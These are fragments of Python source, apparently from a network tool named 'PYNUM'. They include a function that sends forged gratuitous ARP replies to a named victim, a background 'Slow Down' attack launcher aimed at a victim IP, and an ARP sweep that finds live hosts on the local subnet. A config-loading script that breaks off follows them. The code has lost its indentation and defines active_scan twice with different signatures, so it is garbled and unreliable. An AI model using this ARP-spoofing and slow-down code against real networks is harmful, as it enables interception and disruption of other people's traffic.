def create_ARP_request_gratuituous(victim_ip, victim_mac, supplanted_ip,
original_mac, original_iface):
arp = ARP(op=2,
psrc=supplanted_ip,
hwsrc=original_mac,
pdst=victim_ip,
hwdst=victim_mac)
send(arp, iface=original_iface, verbose=0)
print(colored("[*] ARP SPOOFING SENT TO " + victim_ip, "blue"))
if lgd.get_dbg()[1]:
liblog.write_in_file("ARP SPOOFING SENT TO " + victim_ip)
def stop_active_process(action, param):
if debug_mode:
liblog.write_in_file("STOP ACTIVE PROCESS LAUNCHED: " + action +
" - " + param)
# MOVE THROUGH EACH ACTIVE PROCESS
for active_process in active_processes:
# CHECK IF IT IS THE PROCESS WE ARE LOOKING FOR
if (active_process[1] == action):
if (active_process[2] == param):
# KILL THE PROCESS
active_process[0].terminate()
active_process[0].join()
# REMOVE IT FROM THE LIST
active_processes.remove(active_process)
# RETURN 0: OK
if debug_mode:
liblog.write_in_file("PROCESS STOPED")
return 0
# IF IT HAS NOT BEEN FOUND, RETURN 1
if debug_mode:
liblog.write_in_file("ERROR: ACTIVE PROCESS NOT FOUND")
return 1
def slow_down(victim_ip, victim_mac, supplanted_ip, own_mac, interface,
timespace):
if debug_mode:
liblog.write_in_file("SLOW-DOWN LAUNCHED. PARAMETERS: [VICTIM IP=" +
victim_ip + ",VICTIM MAC=" + victim_mac +
",TIMESPACE=" + str(timespace) + "]")
# CHECK IF THERE IS ALREADY ANOTHER SLOW-DOWN ATTACK TO THAT HOST RUNING
active_processes_aux = get_active_processes()
for active_process in active_processes_aux:
if (active_process[1] == 'Slow Down'):
if (active_process[2] == victim_ip):
if debug_mode:
liblog.write_in_file(
"SLOW-DOWNN ABORTED. SIMILAR SLOW-DOWN WAS ALREADY IN PROCESS"
)
return 1
# CREATE THE BACKGROUND PROCESS
process = multiprocessing.Process(target=slow_down_background,
args=(victim_ip, victim_mac,
supplanted_ip, own_mac, interface,
timespace))
# ADD IT TO THE ACTIVE PROCESS LIST
active_process = [process, 'Slow Down', victim_ip]
active_processes.append(active_process)
# START IT
if debug_mode:
liblog.write_in_file("SLOW-DOWN STARTED")
process.start()
return 0
def active_scan(iface_name, tries, loops, timespace):
if debug_mode:
liblog.write_in_file("ACTIVE SCAN LAUNCHED. PARAMETERS: [IFACE=" +
iface_name + ",TRIES=" + str(tries) + ",LOOPS=" +
str(loops) + ",TIMESPACE=" + str(timespace) + "]")
# CHECK IF THERE IS ALREADY ANOTHER SCAN INTO THAT NETWORK RUNING
active_processes_aux = get_active_processes()
for active_process in active_processes_aux:
if (active_process[1] == 'Active Scan'):
if (active_process[2] == iface_name):
if debug_mode:
liblog.write_in_file(
"ACTIVE SCAN ABORTED. SIMILAR SCAN WAS ALREADY IN PROCESS"
)
return 1
# CREATE THE BACKGROUND PROCESS
process = multiprocessing.Process(target=active_scan_background,
args=(iface_name, tries, loops,
timespace, debug_mode, queue))
# ADD IT TO THE ACTIVE PROCESS LIST
active_process = [process, 'Active Scan', iface_name]
active_processes.append(active_process)
# START IT
if debug_mode:
liblog.write_in_file("ACTIVE SCAN STARTED")
process.start()
return 0
def active_scan(iface, tries, loops, timespace, debug_mode):
detected_hosts = []
# GET ALL THE POSSIBLE NETWORK HOST ADDRESSES
iface_address = libifaces.iface_addr(iface)
network_address = libifaces.iface_netaddr(iface)
network_gateway = libifaces.iface_netgw(iface)
netmask = libifaces.iface_netmask(iface)
netmask_cidr = 0
for x in netmask.split('.'):
netmask_cidr = netmask_cidr + bin(int(x)).count('1')
ip_addresses = ipaddress.IPv4Network(network_address + '/' +
str(netmask_cidr))
# GO THROUGH EACH LOOP
for loop in range(int(loops)):
# GO THROUGH EACH IP
for ips in ip_addresses:
# REPEAT EACH IP
for rep in range(int(tries)):
# IF IT IS THE GATEWAY OR OURSELVES CONTINUE TO NEXT ITERATION
if not ((str(ips) == iface_address) or
(str(ips) == network_gateway) or
(str(ips).endswith('.0'))):
# ARP REQUEST
time.sleep(int(timespace))
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(
op=1, pdst=str(ips))
ans, unans = srp(arp_frame,
iface=iface,
timeout=1,
verbose=0)
if debug_mode:
liblog.write_in_file("ARP REQUEST SENT TO " + str(ips))
print(colored("[*] SCANING IP: " + str(ips), "blue"))
# IF ANSWER RECEIVED -> HOST ALIVE
for snt, recv in ans:
if recv:
hostname = 'Unknown hostname'
detected_hosts.append([
str(recv[ARP].psrc),
str(recv[Ether].src), iface, hostname
])
if debug_mode:
liblog.write_in_file("HOST DETECTED: " +
str(ips))
print(
colored(
"[*] HOST ACTIVELY DETECTED: " +
str(recv[ARP].psrc) + ", " +
str(recv[Ether].src), "green"))
# RETURN THE HOSTS ALIVE
return detected_hosts
# **************************************************************************************************************************
# **************************************************************************************************************************
# IMPORTS
import xml.etree.ElementTree as ET
import pathlib
import lib.get_debug as lgd
import lib.log as liblog
import lib.database as libdb
import lib.passive_scanner as libps
liblog.write_in_file("PYNUM STARTED")
# READ CONFIGURATION FILE
xml_file = str(pathlib.Path(__file__).parent.absolute()) + "/config.xml"
xmlTree = ET.parse(xml_file)
rootElement = xmlTree.getroot()
# GET THE USER INTERFACE MODE
ui_aux = rootElement.findall("./ui_mode")
if (not (len(ui_aux) == 1)):
liblog.write_in_file(
"ERROR: USER INTERFACE NOT PROPERLY SET IN THE CONFIG FILE")
print("ERROR: USER INTERFACE NOT PROPERLY SET IN THE CONFIG FILE")
exit()
ui = ui_aux[0].text
if (not (ui == 'gui' or ui == 'cli')):
liblog.write_in_file(
"ERROR: USER INTERFACE NOT PROPERLY SET IN THE CONFIG FILE")
print("ERROR: USER INTERFACE NOT PROPERLY SET IN THE CONFIG FILE")
exit()
# GETTING THE USERNAME AND THE PASSWORD
username_aux = rootElement.findall("./usr")